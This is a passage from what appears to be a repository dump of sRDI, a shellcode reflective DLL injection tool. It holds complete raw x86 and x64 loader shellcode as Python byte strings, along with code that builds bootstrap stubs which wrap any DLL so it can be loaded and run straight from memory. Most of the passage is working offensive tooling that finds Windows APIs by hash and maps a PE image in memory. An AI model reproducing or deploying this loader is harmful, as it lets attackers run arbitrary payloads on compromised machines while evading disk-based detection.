0\x00\x00\x8B\x6C\x24\x18\x03\xC3\x50\xFF\x94\x24\xB8\x00\x00\x00\x8B\xC8\x89\x4C\x24\x1C\x8B\x75\x08\x8B\x7D\x0C\x03\xF3\x03\xFB\x83\x3E\x00\x74\x5B\x8B\x6C\x24\x34\x8B\x17\x85\xD2\x79\x09\x56\x0F\xB7\xC2\x50\x6A\x00\xEB\x30\x83\xC2\x02\x33\xC0\x03\xD3\x89\x54\x24\x28\x38\x02\x74\x0B\x40\x42\x80\x3A\x00\x75\xF9\x8B\x54\x24\x28\x56\x66\x89\x44\x24\x14\x66\x89\x44\x24\x16\x8D\x44\x24\x14\x6A\x00\x89\x54\x24\x1C\x50\x51\xFF\xD5\x83\xC6\x04\x83\xC7\x04\x83\x3E\x00\x74\x06\x8B\x4C\x24\x1C\xEB\xAD\x8B\x6C\x24\x18\x6A\x20\x5A\x03\xEA\x89\x6C\x24\x18\x8B\x45\x00\x85\xC0\x0F\x85\x72\xFF\xFF\xFF\x8B\x6C\x24\x24\x0F\xB7\x75\x14\x33\xC0\x83\xC6\x28\x33\xFF\x66\x3B\x45\x06\x0F\x83\x81\x00\x00\x00\x03\xF5\x83\x3E\x00\x74\x6B\x8B\x4E\x14\x8B\xC1\x25\x00\x00\x00\x40\xF7\xC1\x00\x00\x00\x20\x75\x18\x85\xC0\x75\x0D\x6A\x08\x58\x6A\x01\x85\xC9\x59\x0F\x49\xC1\xEB\x1D\x6A\x04\x58\x6A\x02\xEB\xF1\x85\xC0\x75\x0A\x6A\x10\xB8\x80\x00\x00\x00\x5A\xEB\x03\x6A\x40\x58\x85\xC9\x0F\x49\xC2\x89\x44\x24\x2C\xF7\x46\x14\x00\x00\x00\x04\x74\x09\x0D\x00\x02\x00\x00\x89\x44\x24\x2C\x8D\x4C\x24\x2C\x51\x50\x8B\x46\xFC\xFF\x36\x03\xC3\x50\xFF\x94\x24\xC8\x00\x00\x00\x0F\xB7\x45\x06\x47\x83\xC6\x28\x6A\x20\x5A\x3B\xF8\x72\x81\x6A\x00\x6A\x00\x6A\xFF\xFF\x94\x24\xC8\x00\x00\x00\x83\xBD\xC4\x00\x00\x00\x00\x74\x26\x8B\x85\xC0\x00\x00\x00\x8B\x74\x18\x0C\x8B\x06\x85\xC0\x74\x16\x33\xED\x45\x6A\x00\x55\x53\xFF\xD0\x8D\x76\x04\x8B\x06\x85\xC0\x75\xF1\x8B\x6C\x24\x24\x33\xC0\x40\x50\x50\x8B\x45\x28\x53\x03\xC3\xFF\xD0\x83\xBC\x24\x2C\x01\x00\x00\x00\x0F\x84\xC3\x00\x00\x00\x83\x7D\x7C\x00\x0F\x84\xB9\x00\x00\x00\x8B\x55\x78\x03\xD3\x8B\x6A\x18\x85\xED\x0F\x84\xA9\x00\x00\x00\x83\x7A\x14\x00\x0F\x84\x9F\x00\x00\x00\x8B\x7A\x20\x8B\x4A\x24\x03\xFB\x83\x64\x24\x34\x00\x03\xCB\x85\xED\x0F\x84\x88\x00\x00\x00\x8B\x37\x6A\x00\x58\x89\x44\x24\x18\x03\xF3\x74\x7B\x8A\x06\x84\xC0\x74\x2B\x8B\x6C\x24\x18\x0F\xBE\xC0\x03\xE8\xC1\xCD\x0D\x46\x8A\x06\x84\xC0\x75\xF1\x89\x6C\x24\x18\x8B\x44\x24\x18\x8B\x6A\x18\x39\x84\x24\x2C\x01\x00\x00\x75\x04\x85\xC9\x75\x15\x8B\x44\x24\x34\x83\xC7\x04\x40\x83\xC1\x02\x89\x44\x24\x34\x3B\xC5\x72\xAF\xEB\x35\x0F\xB7\x09\x8B\x42\x1C\x8D\x04\x88\x8B\x04\x18\x03\xC3\xF6\x84\x24\x3C\x01\x00\x00\x08\x74\x0B\x6A\x04\xFF\xB4\x24\x3C\x01\x00\x00\xEB\x0E\xFF\xB4\x24\x34\x01\x00\x00\xFF\xB4\x24\x34\x01\x00\x00\xFF\xD0\x59\x59\x8B\xC3\xEB\x02\x33\xC0\x5F\x5E\x5D\x5B\x81\xC4\x14\x01\x00\x00\xC3\x83\xEC\x14\x64\xA1\x30\x00\x00\x00\x53\x55\x56\x8B\x40\x0C\x57\x89\x4C\x24\x1C\x8B\x78\x0C\xE9\xA5\x00\x00\x00\x8B\x47\x30\x33\xF6\x8B\x5F\x2C\x8B\x3F\x89\x44\x24\x10\x8B\x42\x3C\x89\x7C\x24\x14\x8B\x6C\x10\x78\x89\x6C\x24\x18\x85\xED\x0F\x84\x80\x00\x00\x00\xC1\xEB\x10\x33\xC9\x85\xDB\x74\x2F\x8B\x7C\x24\x10\x0F\xBE\x2C\x0F\xC1\xCE\x0D\x80\x3C\x0F\x61\x89\x6C\x24\x10\x7C\x09\x8B\xC5\x83\xC0\xE0\x03\xF0\xEB\x04\x03\x74\x24\x10\x41\x3B\xCB\x72\xDD\x8B\x7C\x24\x14\x8B\x6C\x24\x18\x8B\x44\x2A\x20\x33\xDB\x8B\x4C\x2A\x18\x03\xC2\x89\x4C\x24\x10\x85\xC9\x74\x34\x8B\x38\x33\xED\x03\xFA\x83\xC0\x04\x89\x44\x24\x20\x8A\x0F\xC1\xCD\x0D\x0F\xBE\xC1\x03\xE8\x47\x84\xC9\x75\xF1\x8B\x7C\x24\x14\x8D\x04\x2E\x3B\x44\x24\x1C\x74\x20\x8B\x44\x24\x20\x43\x3B\x5C\x24\x10\x72\xCC\x8B\x57\x18\x85\xD2\x0F\x85\x50\xFF\xFF\xFF\x33\xC0\x5F\x5E\x5D\x5B\x83\xC4\x14\xC3\x8B\x74\x24\x18\x8B\x44\x16\x24\x8D\x04\x58\x0F\xB7\x0C\x10\x8B\x44\x16\x1C\x8D\x04\x88\x8B\x04\x10\x03\xC2\xEB\xDB'
60 | rdiShellcode64 = b'\x48\x8B\xC4\x48\x89\x58\x08\x44\x89\x48\x20\x4C\x89\x40\x18\x89\x50\x10\x55\x56\x57\x41\x54\x41\x55\x41\x56\x41\x57\x48\x8D\x6C\x24\x90\x48\x81\xEC\x70\x01\x00\x00\x45\x33\xFF\xC7\x45\xD0\x6B\x00\x65\x00\x48\x8B\xF1\x4C\x89\x7D\xF8\xB9\x13\x9C\xBF\xBD\x4C\x89\x7D\xC8\x44\x8B\xEA\x4C\x89\x7D\x08\x45\x8D\x4F\x65\x4C\x89\x7D\x10\x44\x88\x4D\xBC\x44\x88\x4D\xA2\x4C\x89\x7D\x00\x4C\x89\x7D\xE8\x4C\x89\x7D\x18\x44\x89\x7D\x24\x44\x89\x7C\x24\x24\xC7\x45\xD4\x72\x00\x6E\x00\xC7\x45\xD8\x65\x00\x6C\x00\xC7\x45\xDC\x33\x00\x32\x00\xC7\x45\xE0\x2E\x00\x64\x00\xC7\x45\xE4\x6C\x00\x6C\x00\xC7\x44\x24\x40\x53\x6C\x65\x65\xC6\x44\x24\x44\x70\xC7\x44\x24\x58\x4C\x6F\x61\x64\xC7\x44\x24\x5C\x4C\x69\x62\x72\xC7\x44\x24\x60\x61\x72\x79\x41\xC7\x44\x24\x48\x56\x69\x72\x74\xC7\x44\x24\x4C\x75\x61\x6C\x41\xC7\x44\x24\x50\x6C\x6C\x6F\x63\xC7\x44\x24\x68\x56\x69\x72\x74\xC7\x44\x24\x6C\x75\x61\x6C\x50\xC7\x44\x24\x70\x72\x6F\x74\x65\x66\xC7\x44\x24\x74\x63\x74\xC7\x45\xA8\x46\x6C\x75\x73\xC7\x45\xAC\x68\x49\x6E\x73\xC7\x45\xB0\x74\x72\x75\x63\xC7\x45\xB4\x74\x69\x6F\x6E\xC7\x45\xB8\x43\x61\x63\x68\xC7\x44\x24\x78\x47\x65\x74\x4E\xC7\x44\x24\x7C\x61\x74\x69\x76\xC7\x45\x80\x65\x53\x79\x73\xC7\x45\x84\x74\x65\x6D\x49\x66\xC7\x45\x88\x6E\x66\xC6\x45\x8A\x6F\xC7\x45\x90\x52\x74\x6C\x41\xC7\x45\x94\x64\x64\x46\x75\xC7\x45\x98\x6E\x63\x74\x69\xC7\x45\x9C\x6F\x6E\x54\x61\x66\xC7\x45\xA0\x62\x6C\xE8\x64\x08\x00\x00\xB9\xB5\x41\xD9\x5E\x48\x8B\xD8\xE8\x57\x08\x00\x00\x4C\x8B\xE0\x48\x89\x45\xF0\x48\x8D\x45\xD0\xC7\x45\x20\x18\x00\x18\x00\x4C\x8D\x4C\x24\x38\x48\x89\x45\x28\x4C\x8D\x45\x20\x33\xD2\x33\xC9\xFF\xD3\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x48\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xC8\xC7\x44\x24\x20\x0C\x00\x0C\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x68\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x00\xC7\x44\x24\x20\x0E\x00\x0E\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\xC7\x44\x24\x20\x15\x00\x15\x00\x48\x8B\x4C\x24\x38\x48\x8D\x45\xA8\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x08\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x78\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x10\xC7\x44\x24\x20\x13\x00\x13\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x40\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xE8\xC7\x44\x24\x20\x05\x00\x05\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x45\x90\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x18\xC7\x44\x24\x20\x13\x00\x13\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x58\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xF8\xC7\x44\x24\x20\x0C\x00\x0C\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x4C\x39\x7D\xC8\x0F\x84\x03\x07\x00\x00\x4C\x39\x7D\x00\x0F\x84\xF9\x06\x00\x00\x4C\x39\x7D\xE8\x0F\x84\xEF\x06\x00\x00\x4C\x39\x7D\x08\x0F\x84\xE5\x06\x00\x00\x4C\x8B\x4D\x10\x4D\x85\xC9\x0F\x84\xD8\x06\x00\x00\x48\x63\x7E\x3C\x48\x03\xFE\x81\x3F\x50\x45\x00\x00\x0F\x85\xC5\x06\x00\x00\xB8\x64\x86\x00\x00\x66\x39\x47\x04\x0F\x85\xB6\x06\x00\x00\x44\x8B\x47\x38\x45\x8D\x5F\x01\x45\x84\xC3\x0F\x85\xA5\x06\x00\x00\x0F\xB7\x4F\x14\x41\x8B\xDF\x48\x83\xC1\x24\x66\x44\x3B\x7F\x06\x73\x29\x44\x0F\xB7\x57\x06\x48\x03\xCF\x8B\x41\x04\x8B\x11\x85\xC0\x75\x06\x41\x8D\x04\x10\xEB\x02\x03\xC2\x3B\xC3\x0F\x46\xC3\x48\x83\xC1\x28\x8B\xD8\x4D\x2B\xD3\x75\xDF\x48\x8D\x4D\x38\x41\xFF\xD1\x8B\x55\x3C\x44\x8B\xC2\x44\x8D\x72\xFF\xF7\xDA\x44\x03\x77\x50\x49\x8D\x48\xFF\x8B\xC2\x4C\x23\xF0\x8B\xC3\x48\x03\xC8\x49\x8D\x40\xFF\x48\xF7\xD0\x48\x23\xC8\x4C\x3B\xF1\x0F\x85\x32\x06\x00\x00\x48\x8B\x4F\x30\x41\xB9\x04\x00\x00\x00\x41\xB8\x00\x30\x00\x00\x49\x8B\xD6\xFF\x55\xC8\x48\x8B\xD8\x48\x85\xC0\x75\x15\x44\x8D\x48\x04\x41\xB8\x00\x30\x00\x00\x49\x8B\xD6\x33\xC9\xFF\x55\xC8\x48\x8B\xD8\x41\xBB\x01\x00\x00\x00\x44\x84\x9D\xD8\x00\x00\x00\x74\x1D\x8B\x46\x3C\x89\x43\x3C\x8B\x56\x3C\xEB\x0B\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88\x04\x19\x3B\x57\x54\x72\xF0\xEB\x19\x41\x8B\xD7\x44\x39\x7F\x54\x76\x10\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88\x04\x19\x3B\x57\x54\x72\xF0\x48\x63\x7B\x3C\x45\x8B\xD7\x48\x03\xFB\x48\x89\x7D\x30\x44\x0F\xB7\x47\x14\x49\x83\xC0\x28\x66\x44\x3B\x7F\x06\x73\x3A\x4C\x03\xC7\x45\x8B\xCF\x45\x39\x38\x76\x1F\x41\x8B\x50\x04\x41\x8B\x48\xFC\x41\x8B\xC1\x45\x03\xCB\x48\x03\xC8\x48\x03\xD0\x8A\x04\x32\x88\x04\x19\x45\x3B\x08\x72\xE1\x0F\xB7\x47\x06\x45\x03\xD3\x49\x83\xC0\x28\x44\x3B\xD0\x72\xC9\x4C\x8B\xF3\x41\xB8\x02\x00\x00\x00\x4C\x2B\x77\x30\x0F\x84\xD6\x00\x00\x00\x44\x39\xBF\xB4\x00\x00\x00\x0F\x84\xC9\x00\x00\x00\x44\x8B\x8F\xB0\x00\x00\x00\x4C\x03\xCB\x45\x39\x39\x0F\x84\xB6\x00\x00\x00\x4D\x8D\x51\x08\xE9\x91\x00\x00\x00\x45\x0F\xB7\x1A\x41\x0F\xB7\xCB\x41\x0F\xB7\xC3\x66\xC1\xE9\x0C\x66\x83\xF9\x0A\x75\x29\x45\x8B\x01\x41\x81\xE3\xFF\x0F\x00\x00\x4B\x8D\x04\x18\x48\x8B\x14\x18\x4B\x8D\x04\x18\x41\xBB\x01\x00\x00\x00\x49\x03\xD6\x48\x89\x14\x18\x45\x8D\x43\x01\xEB\x4F\x41\xBB\x01\x00\x00\x00\x66\x83\xF9\x03\x75\x0E\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x41\x8B\xC6\xEB\x2E\x66\x41\x3B\xCB\x75\x15\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x49\x8B\xC6\x48\xC1\xE8\x10\x0F\xB7\xC0\xEB\x13\x66\x41\x3B\xC8\x75\x14\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x41\x0F\xB7\xC6\x41\x8B\x11\x48\x01\x04\x0A\x4D\x03\xD0\x41\x8B\x41\x04\x49\x03\xC1\x4C\x3B\xD0\x0F\x85\x5F\xFF\xFF\xFF\x4D\x8B\xCA\x45\x39\x3A\x0F\x85\x4A\xFF\xFF\xFF\x44\x39\xBF\x94\x00\x00\x00\x0F\x84\x9B\x01\x00\x00\x8B\x8F\x90\x00\x00\x00\x45\x8B\xEF\x4C\x8D\x04\x19\x49\x8D\x40\x0C\xEB\x07\x45\x03\xEB\x48\x8D\x40\x14\x44\x39\x38\x75\xF4\x8B\x85\xD8\x00\x00\x00\x45\x8B\xE7\x83\xE0\x04\x89\x45\xC0\x8B\xC1\x0F\x84\x8E\x00\x00\x00\x45\x3B\xEB\x0F\x86\x85\x00\x00\x00\x44\x8B\xA5\xD8\x00\x00\x00\x45\x8D\x5D\xFF\x41\xC1\xEC\x10\x45\x8B\xD7\x45\x85\xDB\x74\x6E\x4D\x8B\xC8\x41\xBE\xFF\x7F\x00\x00\x41\x0F\x10\x01\x33\xD2\x41\x8B\xCD\x41\x2B\xCA\x69\xF6\xFD\x43\x03\x00\x41\x8B\xC6\xF7\xF1\x33\xD2\x81\xC6\xC3\x9E\x26\x00\x8D\x48\x01\x8B\xC6\xC1\xE8\x10\x41\x23\xC6\xF7\xF1\x41\x03\xC2\x41\xFF\xC2\x48\x8D\x0C\x80\x41\x8B\x54\x88\x10\x41\x0F\x10\x0C\x88\x41\x0F\x11\x04\x88\x41\x8B\x41\x10\x41\x89\x44\x88\x10\x41\x0F\x11\x09\x41\x89\x51\x10\x4D\x8D\x49\x14\x45\x3B\xD3\x72\xA1\x8B\x87\x90\x00\x00\x00\x8B\xF0\x48\x03\xF3\x8B\x46\x0C\x85\xC0\x0F\x84\xBC\x00\x00\x00\x8B\x7D\xC0\x8B\xC8\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x4C\x8B\xD0\x44\x8B\x36\x44\x8B\x7E\x10\x4C\x03\xF3\x4C\x03\xFB\x49\x8B\x0E\x48\x85\xC9\x74\x65\x48\x8B\x7D\xF0\x48\x85\xC9\x79\x08\x45\x0F\xB7\x06\x33\xD2\xEB\x32\x48\x8D\x53\x02\x33\xC0\x48\x03\xD1\x38\x02\x74\x0E\x48\x8B\xCA\x48\xFF\xC1\x48\xFF\xC0\x80\x39\x00\x75\xF5\x48\x89\x54\x24\x28\x45\x33\xC0\x48\x8D\x54\x24\x20\x66\x89\x44\x24\x20\x66\x89\x44\x24\x22\x4D\x8B\xCF\x49\x8B\xCA\xFF\xD7\x49\x83\xC6\x08\x49\x83\xC7\x08\x49\x8B\x0E\x48\x85\xC9\x74\x07\x4C\x8B\x54\x24\x38\xEB\xA2\x8B\x7D\xC0\x45\x33\xFF\x45\x85\xE4\x74\x14\x85\xFF\x74\x10\x41\x83\xFD\x01\x76\x0A\x41\x69\xCC\xE8\x03\x00\x00\xFF\x55\xE8\x8B\x46\x20\x48\x83\xC6\x14\x85\xC0\x0F\x85\x4B\xFF\xFF\xFF\x48\x8B\x7D\x30\x44\x8B\xAD\xB8\x00\x00\x00\x4C\x8B\x65\xF0\x44\x39\xBF\xF4\x00\x00\x00\x0F\x84\xB9\x00\x00\x00\x44\x8B\xBF\xF0\x00\x00\x00\x49\x83\xC7\x04\x4C\x03\xFB\x41\x8B\x07\x85\xC0\x0F\x84\x9D\x00\x00\x00\x41\xBD\x20\x00\x00\x00\x8B\xC8\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x48\x8B\xC8\x41\x8B\x77\x08\x45\x8B\x77\x0C\x48\x03\xF3\x4C\x03\xF3\x48\x83\x3E\x00\x74\x5E\x49\x8B\x16\x48\x85\xD2\x79\x08\x44\x0F\xB7\xC2\x33\xD2\xEB\x33\x4C\x8D\x43\x02\x33\xC0\x4C\x03\xC2\x41\x38\x00\x74\x0E\x49\x8B\xD0\x48\xFF\xC2\x48\xFF\xC0\x80\x3A\x00\x75\xF5\x4C\x89\x44\x24\x28\x48\x8D\x54\x24\x20\x45\x33\xC0\x66\x89\x44\x24\x20\x66\x89\x44\x24\x22\x4C\x8B\xCE\x41\xFF\xD4\x48\x83\xC6\x08\x49\x83\xC6\x08\x48\x83\x3E\x00\x74\x07\x48\x8B\x4C\x24\x38\xEB\xA2\x4D\x03\xFD\x41\x8B\x07\x85\xC0\x0F\x85\x70\xFF\xFF\xFF\x44\x8B\xAD\xB8\x00\x00\x00\x45\x33\xFF\x0F\xB7\x77\x14\x45\x8B\xF7\x48\x83\xC6\x28\x41\xBC\x01\x00\x00\x00\x66\x44\x3B\x7F\x06\x0F\x83\xA4\x00\x00\x00\x48\x03\xF7\x45\x8D\x6C\x24\x1F\x44\x39\x3E\x74\x7C\x8B\x46\x14\x8B\xC8\x81\xE1\x00\x00\x00\x40\x0F\xBA\xE0\x1D\x72\x22\x85\xC9\x75\x0C\x85\xC0\x44\x8D\x41\x08\x45\x0F\x49\xC4\xEB\x33\x41\xB8\x04\x00\x00\x00\x85\xC0\x41\x8D\x40\xFE\x44\x0F\x49\xC0\xEB\x21\x85\xC9\x75\x11\xB9\x10\x00\x00\x00\x85\xC0\x44\x8D\x41\x70\x44\x0F\x49\xC1\xEB\x0C\x85\xC0\x41\xB8\x40\x00\x00\x00\x45\x0F\x49\xC5\x44\x89\x44\x24\x30\xF7\x46\x14\x00\x00\x00\x04\x74\x0A\x41\x0F\xBA\xE8\x09\x44\x89\x44\x24\x30\x8B\x4E\xFC\x4C\x8D\x4C\x24\x30\x8B\x16\x48\x03\xCB\xFF\x55\x00\x0F\xB7\x47\x06\x45\x03\xF4\x48\x83\xC6\x28\x44\x3B\xF0\x0F\x82\x6B\xFF\xFF\xFF\x44\x8B\xAD\xB8\x00\x00\x00\x45\x33\xC0\x33\xD2\x48\x83\xC9\xFF\xFF\x55\x08\x44\x39\xBF\xD4\x00\x00\x00\x74\x24\x8B\x87\xD0\x00\x00\x00\x48\x8B\x74\x18\x18\xEB\x0F\x45\x33\xC0\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x48\x8D\x76\x08\x48\x8B\x06\x48\x85\xC0\x75\xE9\x4C\x8B\x4D\x18\x4D\x85\xC9\x74\x2F\x8B\x87\xA4\x00\x00\x00\x85\xC0\x74\x25\x8B\xC8\x4C\x8B\xC3\x48\xB8\xAB\xAA\xAA\xAA\xAA\xAA\xAA\xAA\x48\xF7\xE1\x8B\x8F\xA0\x00\x00\x00\x48\xC1\xEA\x03\x48\x03\xCB\x41\x2B\xD4\x41\xFF\xD1\x8B\x47\x28\x4D\x8B\xC4\x48\x03\xC3\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x45\x85\xED\x0F\x84\xBB\x00\x00\x00\x44\x39\xBF\x8C\x00\x00\x00\x0F\x84\xAE\x00\x00\x00\x8B\x8F\x88\x00\x00\x00\x48\x03\xCB\x44\x8B\x59\x18\x45\x85\xDB\x0F\x84\x98\x00\x00\x00\x44\x39\x79\x14\x0F\x84\x8E\x00\x00\x00\x44\x8B\x49\x20\x41\x8B\xFF\x8B\x51\x24\x4C\x03\xCB\x48\x03\xD3\x45\x85\xDB\x74\x79\x45\x8B\x01\x45\x8B\xD7\x4C\x03\xC3\x74\x6E\x41\x8A\x00\x84\xC0\x74\x1E\x4D\x03\xC4\x0F\xBE\xC0\x44\x03\xD0\x41\xC1\xCA\x0D\x41\x8A\x00\x84\xC0\x75\xEC\x45\x3B\xEA\x75\x05\x48\x85\xD2\x75\x12\x41\x03\xFC\x49\x83\xC1\x04\x48\x83\xC2\x02\x41\x3B\xFB\x73\x39\xEB\xBE\x8B\x41\x1C\x0F\xB7\x0A\x48\x03\xC3\x44\x8B\x04\x88\x4C\x03\xC3\xF6\x85\xD8\x00\x00\x00\x08\x74\x0E\x48\x8B\x8D\xD0\x00\x00\x00\xBA\x08\x00\x00\x00\xEB\x0D\x8B\x95\xC8\x00\x00\x00\x48\x8B\x8D\xC0\x00\x00\x00\x41\xFF\xD0\x48\x8B\xC3\xEB\x02\x33\xC0\x48\x8B\x9C\x24\xB0\x01\x00\x00\x48\x81\xC4\x70\x01\x00\x00\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x5F\x5E\x5D\xC3\x48\x8B\xC4\x48\x89\x58\x08\x48\x89\x68\x10\x48\x89\x70\x18\x48\x89\x78\x20\x41\x56\x48\x83\xEC\x10\x65\x48\x8B\x04\x25\x60\x00\x00\x00\x8B\xE9\x45\x33\xF6\x48\x8B\x50\x18\x4C\x8B\x52\x10\x4D\x8B\x42\x30\x4D\x85\xC0\x0F\x84\xB7\x00\x00\x00\x41\x0F\x10\x42\x58\x49\x63\x40\x3C\x41\x8B\xD6\x4D\x8B\x12\xF3\x0F\x7F\x04\x24\x46\x8B\x9C\x00\x88\x00\x00\x00\x45\x85\xDB\x74\xD2\x48\x8B\x04\x24\x48\xC1\xE8\x10\x66\x44\x3B\xF0\x73\x22\x48\x8B\x4C\x24\x08\x44\x0F\xB7\xC8\x0F\xBE\x01\xC1\xCA\x0D\x80\x39\x61\x7C\x03\x83\xC2\xE0\x03\xD0\x48\xFF\xC1\x49\x83\xE9\x01\x75\xE7\x4B\x8D\x3C\x18\x44\x8B\x4F\x18\x8B\x47\x20\x41\xFF\xC9\x49\x03\xC0\x4A\x8D\x34\x88\xEB\x28\x8B\x1E\x45\x8B\xDE\x49\x03\xD8\x48\x8D\x76\xFC\x0F\xBE\x0B\x48\xFF\xC3\x41\xC1\xCB\x0D\x44\x03\xD9\x84\xC9\x75\xEF\x41\x8D\x04\x13\x3B\xC5\x74\x0E\x41\xFF\xC9\x41\x83\xF9\x01\x77\xD2\xE9\x58\xFF\xFF\xFF\x8B\x47\x24\x43\x8D\x0C\x09\x49\x03\xC0\x0F\xB7\x14\x01\x8B\x4F\x1C\x49\x03\xC8\x8B\x04\x91\x49\x03\xC0\xEB\x02\x33\xC0\x48\x8B\x5C\x24\x20\x48\x8B\x6C\x24\x28\x48\x8B\x74\x24\x30\x48\x8B\x7C\x24\x38\x48\x83\xC4\x10\x41\x5E\xC3'
61 | #MARKER:E
62 |
63 | if is64BitDLL(dllBytes):
64 |
65 | rdiShellcode = rdiShellcode64
66 |
67 | bootstrap = b''
68 | bootstrapSize = 69
69 |
70 | # call next instruction (Pushes next instruction address to stack)
71 | bootstrap += b'\xe8\x00\x00\x00\x00'
72 |
73 | # Set the offset to our DLL from pop result
74 | dllOffset = bootstrapSize - len(bootstrap) + len(rdiShellcode)
75 |
76 | # pop rcx - Capture our current location in memory
77 | bootstrap += b'\x59'
78 |
79 | # mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
80 | bootstrap += b'\x49\x89\xc8'
81 |
82 | # mov edx,
83 | bootstrap += b'\xba'
84 | bootstrap += pack('I', functionHash)
85 |
86 | # Setup the location of our user data
87 | # add r8, +
88 | bootstrap += b'\x49\x81\xc0'
89 | userDataLocation = dllOffset + len(dllBytes)
90 | bootstrap += pack('I', userDataLocation)
91 |
92 | # mov r9d,
93 | bootstrap += b'\x41\xb9'
94 | bootstrap += pack('I', len(userData))
95 |
96 | # push rsi - save original value
97 | bootstrap += b'\x56'
98 |
99 | # mov rsi, rsp - store our current stack pointer for later
100 | bootstrap += b'\x48\x89\xe6'
101 |
102 | # and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
103 | bootstrap += b'\x48\x83\xe4\xf0'
104 |
105 | # sub rsp, 0x38 - Create some breathing room on the stack
106 | bootstrap += b'\x48\x83\xec'
107 | bootstrap += b'\x30' # 32 bytes for shadow space + 16 bytes for last args
108 |
109 | # mov qword ptr [rsp + 0x28], rcx (shellcode base) - Push in arg 5
110 | bootstrap += b'\x48\x89\x4C\x24'
111 | bootstrap += b'\x28'
112 |
113 | # add rcx,
114 | bootstrap += b'\x48\x81\xc1'
115 | bootstrap += pack('I', dllOffset)
116 |
117 | # mov dword ptr [rsp + 0x20], - Push in arg 6 just above shadow space
118 | bootstrap += b'\xC7\x44\x24'
119 | bootstrap += b'\x20'
120 | bootstrap += pack('I', flags)
121 |
122 | # call - Transfer execution to the RDI
123 | bootstrap += b'\xe8'
124 | bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # Skip over the remainder of instructions
125 | bootstrap += b'\x00\x00\x00'
126 |
127 | # mov rsp, rsi - Reset our original stack pointer
128 | bootstrap += b'\x48\x89\xf4'
129 |
130 | # pop rsi - Put things back where we left them
131 | bootstrap += b'\x5e'
132 |
133 | # ret - return to caller
134 | bootstrap += b'\xc3'
135 |
136 | if len(bootstrap) != bootstrapSize:
137 | raise Exception("x64 bootstrap length: {} != bootstrapSize: {}".format(len(bootstrap), bootstrapSize))
138 |
139 | # Ends up looking like this in memory:
140 | # Bootstrap shellcode
141 | # RDI shellcode
142 | # DLL bytes
143 | # User data
144 | return bootstrap + rdiShellcode + dllBytes + userData
145 |
146 | else: # 32 bit
147 | rdiShellcode = rdiShellcode32
148 |
149 | bootstrap = b''
150 | bootstrapSize = 50
151 |
152 | # call next instruction (Pushes next instruction address to stack)
153 | bootstrap += b'\xe8\x00\x00\x00\x00'
154 |
155 | # Set the offset to our DLL from pop result
156 | dllOffset = bootstrapSize - len(bootstrap) + len(rdiShellcode)
157 |
158 | # pop eax - Capture our current location in memory
159 | bootstrap += b'\x58'
160 |
161 | # push ebp
162 | bootstrap += b'\x55'
163 |
164 | # mov ebp, esp
165 | bootstrap += b'\x89\xe5'
166 |
167 | # mov edx, eax - copy our location in memory to ebx before we start modifying eax
168 | bootstrap += b'\x89\xc2'
169 |
170 | # push
171 | bootstrap += b'\x68'
172 | bootstrap += pack('I', flags)
173 |
174 | # push eax
175 | bootstrap += b'\x50'
176 |
177 | # add edx, +
178 | bootstrap += b'\x81\xc2'
179 | userDataLocation = dllOffset + len(dllBytes)
180 | bootstrap += pack('I', userDataLocation)
181 |
182 | # push
183 | bootstrap += b'\x68'
184 | bootstrap += pack('I', len(userData))
185 |
186 | # push edx
187 | bootstrap += b'\x52'
188 |
189 | # push
190 | bootstrap += b'\x68'
191 | bootstrap += pack('I', functionHash)
192 |
193 | # add eax,
194 | bootstrap += b'\x05'
195 | bootstrap += pack('I', dllOffset)
196 |
197 | # push eax
198 | bootstrap += b'\x50'
199 |
200 | # call - Transfer execution to the RDI
201 | bootstrap += b'\xe8'
202 | bootstrap += pack('b', bootstrapSize - len(bootstrap) - 4) # Skip over the remainder of instructions
203 | bootstrap += b'\x00\x00\x00'
204 |
205 | # add esp, 0x14 - remove arguments from stack (cdecl)
206 | bootstrap += b'\x83\xc4\x14'
207 |
208 | # leave
209 | bootstrap += b'\xc9'
210 |
211 | # ret - return to caller
212 | bootstrap += b'\xc3'
213 |
214 | if len(bootstrap) != bootstrapSize:
215 | raise Exception("x86 bootstrap length: {} != bootstrapSize: {}".format(len(bootstrap), bootstrapSize))
216 |
217 | # Ends up looking like this in memory:
218 | # Bootstrap shellcode
219 | # RDI shellcode
220 | # DLL bytes
221 | # User data
222 | return bootstrap + rdiShellcode + dllBytes + userData
223 |
224 | return False
225 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # sRDI - Shellcode Reflective DLL Injection
